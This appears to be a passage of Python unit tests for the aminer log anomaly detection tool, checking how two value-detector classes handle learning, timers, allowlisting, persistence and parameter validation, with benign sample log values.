NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(nmpvcd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertTrue(nmpvcd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(nmpvcd.receive_atom(log_atom2)) self.assertTrue(nmpvcd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertTrue(nmpvcd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertFalse(nmpvcd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = time.time() nmpvcd.next_persist_time = t + 400 self.assertEqual(nmpvcd.do_timer(t + 200), 200) self.assertEqual(nmpvcd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(nmpvcd.do_timer(t + 999), 1) self.assertEqual(nmpvcd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) analysis = "Analysis.%s" value = b"value" value2 = b"value2" log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmpvcd) nmpvcd.receive_atom(log_atom1) self.assertRaises(Exception, nmpvcd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None) # The NewMatchPathValueComboDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, nmpvcd.allowlist_event, analysis % nmpvcd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(nmpvcd.allowlist_event(analysis % nmpvcd.__class__.__name__, (value, value2), None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (value, value2))) self.assertEqual(nmpvcd.known_values_set, {(b" pid=", b"25537"), (value, value2)}) self.assertRaises(TypeError, nmpvcd.allowlist_event, analysis % nmpvcd.__class__.__name__, (value, None), None) # allow_missing_values_flag = True nmpvcd.allow_missing_values_flag = True self.assertEqual(nmpvcd.allowlist_event(analysis % nmpvcd.__class__.__name__, (value, None), None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (value, None))) self.assertEqual(nmpvcd.known_values_set, {(b" pid=", b"25537"), (value, value2), (value, None)}) def test4persistence(self): """Test the do_persist and load_persistence_data methods.""" nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmpvcd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmpvcd) log_atom3 = LogAtom(self.match_element4.match_string, ParserMatch(self.match_element4), t, nmpvcd) self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertTrue(nmpvcd.receive_atom(log_atom2)) self.assertFalse(nmpvcd.receive_atom(log_atom3)) self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537")}) nmpvcd.do_persist() with open(nmpvcd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[["bytes: pid=", "bytes:25537"], ["bytes:ddd ", "bytes:25538"]]') nmpvcd.known_values_set = set() nmpvcd.load_persistence_data() self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537")}) other = NewMatchPathValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler]) self.assertEqual(nmpvcd.known_values_set, other.known_values_set) nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, allow_missing_values_flag=True) self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertTrue(nmpvcd.receive_atom(log_atom2)) self.assertTrue(nmpvcd.receive_atom(log_atom3)) self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537"), (b"ddd ", None)}) nmpvcd.known_values_set = {(b"ddd ", b"25538"), (b" pid=", b"25537"), (b"ddd ", None)} nmpvcd.do_persist() with open(nmpvcd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[["bytes: pid=", "bytes:25537"], ["bytes:ddd ", null], ["bytes:ddd ", "bytes:25538"]]') nmpvcd.known_values_set = set() nmpvcd.load_persistence_data() self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537"), (b"ddd ", None)}) other = NewMatchPathValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler]) self.assertEqual(nmpvcd.known_values_set, other.known_values_set) def test5validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, [""], [self.stream_printer_event_handler]) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], ["default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], None) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], "") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], b"Default") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], True) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], 123) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], 123.3) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], {"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], ()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], set()) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=b"True") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag="True") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123.22) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=["Default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=[]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=True) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchPathValueDetectorTest.py000066400000000000000000000512101500476301700320260ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement import time from datetime import datetime from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class NewMatchPathValueDetectorTest(TestBase): """Unittests for the NewMatchPathValueDetector.""" match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) match_context2 = DummyMatchContext(b"25537 uid=2") fdme2 = DummyFixedDataModelElement("d1", b"25537") match_element2 = fdme2.get_match_element("", match_context2) def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s New value(s) detected\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" # learn_mode = True nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpvd) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpvd) self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvd.__class__.__name__, 1, "{'/s1': ' pid='}")) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # learn_mode = False nmpvd.learn_mode = False self.assertTrue(nmpvd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvd.__class__.__name__, 1, "{'/d1': '25537'}")) self.reset_output_stream() # repeating should produce the same result self.assertTrue(nmpvd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvd.__class__.__name__, 1, "{'/d1': '25537'}")) # stop_learning_time nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(nmpvd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertTrue(nmpvd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertFalse(nmpvd.learn_mode) # stop_learning_no_anomaly_time nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(nmpvd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertTrue(nmpvd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(nmpvd.receive_atom(log_atom2)) self.assertTrue(nmpvd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertTrue(nmpvd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertFalse(nmpvd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" nmpvd = NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = time.time() nmpvd.next_persist_time = t + 400 self.assertEqual(nmpvd.do_timer(t + 200), 200) self.assertEqual(nmpvd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(nmpvd.do_timer(t + 999), 1) self.assertEqual(nmpvd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) analysis = "Analysis.%s" value = b"value" value2 = b"value2" log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpvd) nmpvd.receive_atom(log_atom1) self.assertRaises(Exception, nmpvd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None) # The NewMatchPathValueDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, nmpvd.allowlist_event, analysis % nmpvd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(nmpvd.allowlist_event(analysis % nmpvd.__class__.__name__, value, None), "Allowlisted path(s) %s with %s." % (self.match_element1.path, value.decode())) self.assertEqual(nmpvd.known_values_set, {b" pid=", b"value"}) nmpvd.learn_mode = False self.assertEqual(nmpvd.allowlist_event(analysis % nmpvd.__class__.__name__, value2, None), "Allowlisted path(s) %s with %s." % (self.match_element1.path, value2.decode())) self.assertEqual(nmpvd.known_values_set, {b" pid=", b"value", b"value2"}) def test4persistence(self): """Test the do_persist and load_persistence_data methods.""" nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpvd) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpvd) self.assertTrue(nmpvd.receive_atom(log_atom1)) self.assertTrue(nmpvd.receive_atom(log_atom2)) self.assertEqual(nmpvd.known_values_set, {b" pid=", b"25537"}) nmpvd.do_persist() with open(nmpvd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '["bytes: pid=", "bytes:25537"]') nmpvd.known_values_set = set() nmpvd.load_persistence_data() self.assertEqual(nmpvd.known_values_set, {b" pid=", b"25537"}) other = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler]) self.assertEqual(nmpvd.known_values_set, other.known_values_set) def test5validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, [""], [self.stream_printer_event_handler]) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], ["default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], None) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], "") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], 123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], 123.3) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], {"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], ()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], set()) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22) 